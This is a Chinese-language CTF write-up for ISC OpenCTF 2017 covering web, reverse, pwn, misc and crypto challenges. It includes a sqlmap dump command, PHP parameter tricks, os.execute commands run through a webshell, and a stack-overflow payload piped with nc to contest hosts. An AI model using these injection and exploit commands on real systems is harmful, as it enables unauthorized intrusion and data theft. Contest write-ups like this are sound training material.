ISC极客嘉年华OpenCTF-2017Writeup

发表于 | 分类于 |

0x00前言

这是一次很简单很简单的CTF,就当练练手吧……

0x01 Writeup

1.WEB

1.1 variacover

请求http://202.112.51.184:8103/?id=a[0]=240610708
得到flag

XCTF{sTr_covcderd_AND_you_kn0W?}

1.2 urldecode

请求http://202.112.51.184:8102?id=OPE%25%34%65CTF
得到flag

XCTF{UrlDeCode_oL_yOu_lol!}

1.3 SQL注入

用sqlmap注入

python sqlmap.py -u "http://202.112.51.184:8201?id=1" --dump -T "flag" -D "security"

得到flag

XCTF{ut9x2a5f8t9e6s3a4g5j}

1.4 jsjs

由于禁用右键功能,使用Firefox的Web Developer插件查看源代码
得到flag

XCTF{_O0oo0O_js_is_FUNNY!}

2.REVERSE

OpenReverse

下载文件,直接用notepade++打开,看到flag:

XCTF{5eacs6y8p1o9gitc9521}

3.PWN

3.1 getshell

参考 CSAW CTF 2016 aul (100) Writeup
在webshell中直接执行如下命令:
os.execute(“ls”)
os.execute(“cat flag”)
得到flag:

XCTF{q0Cr1iwqlW*W1m8ejiK*0z9JUa1gq@n&}

3.2 blind

执行如下python程序

1
python -c 'from struct import pack as p; print "A" * 72 + p("Q", 0x40060d)' | nc 202.112.51.184 8301

得到flag:

XCTF{sQ^yeLZKBVkoZ7^zOtigV5xsepBY&bB7}

4.MISC

4.1 zip

利用Advanced ZIP Password Recovery 4.0,选择纯数字爆破得到zip解密密码为88888888,
解压压缩包的flag:

XCTF{ke&cVR3OHWHx42ZygOceozE6KIxz1Zzj}

4.2 pcap

Wireshark追踪流得:

1
2
3
4
5
6
7
8
GET /?q=XCTF%7BRSUJecDZ5xFp1z1X%26Nmpt%40PZSDQ%25Gbx6%7D HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.1.115/
Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-GB;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate
Host: 192.168.1.115
Connection: Keep-Alive

对参数q的值URLdecode后获得flag:

XCTF{RSUJecDZ5xFp1z1X&Nmpt@PZSDQ%Gbx6}

5.CRYPTO

5.1 Maya Cipher

百度搜索Maya numerals的编码规则如下:

Maya numerals
得到

1
2
3
4
584354467b
323031385f
69735f636f
6d696e677d

每行对应16进制解码得flag:

XCTF{2018_is_coming}

5.2 RSA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def egcd(a, b):
    if a == 0:
      return (b, 0, 1)
    else:
      g, y, x = egcd(b % a, a)
      return (g, x - (b // a) * y, y)
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
      raise Exception('modular inverse does not exist')
    else:
      return x % m
p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
e = 65537
d = modinv(e, (p-1)*(q-1))
print d
c= 69016319356655639210194946570348715066396274579181987745484908846232464436640043461016746215950609916307004870722625663551955221548688400875709926061159609460224830151731941059363474236594094101209402353834752606848369320902191207004466087273869348206495061740962728586464640440980967989689860668335396868406

m=pow(c,d,p*q)
print "flag:"
print m

flag:
554035859905981120888026046266284028688068004006280022208626